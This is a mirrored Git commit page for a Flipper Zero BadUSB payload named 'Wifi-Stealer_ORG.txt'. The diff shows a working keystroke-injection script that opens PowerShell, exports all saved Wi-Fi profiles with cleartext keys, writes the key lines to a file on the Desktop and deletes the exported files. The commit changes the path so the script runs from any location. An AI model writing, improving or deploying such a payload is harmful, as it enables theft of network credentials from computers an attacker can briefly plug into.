mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-22 14:30:21 +00:00
Update Wifi-Stealer_ORG.txt
On my PC it does open in powershell location. I use power toys overlay for Run. This will redirect to the desktop from anywhere
This commit is contained in:
parent
de40b7fbff
commit
6c977513e6
@ -9,5 +9,5 @@ DELAY 500
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING cd Desktop;netsh wlan export profile key=clear;Select-String -Path Wi-Fi-* -Pattern 'keyMaterial'>0.txt;del Wi-Fi-*;exit
|
||||
STRING cd C:\Users\$env:UserName\Desktop;netsh wlan export profile key=clear;Select-String -Path Wi-Fi-* -Pattern 'keyMaterial'>0.txt;del Wi-Fi-*;exit
|
||||
ENTER
|
||||
|
Loading…
Reference in New Issue
Block a user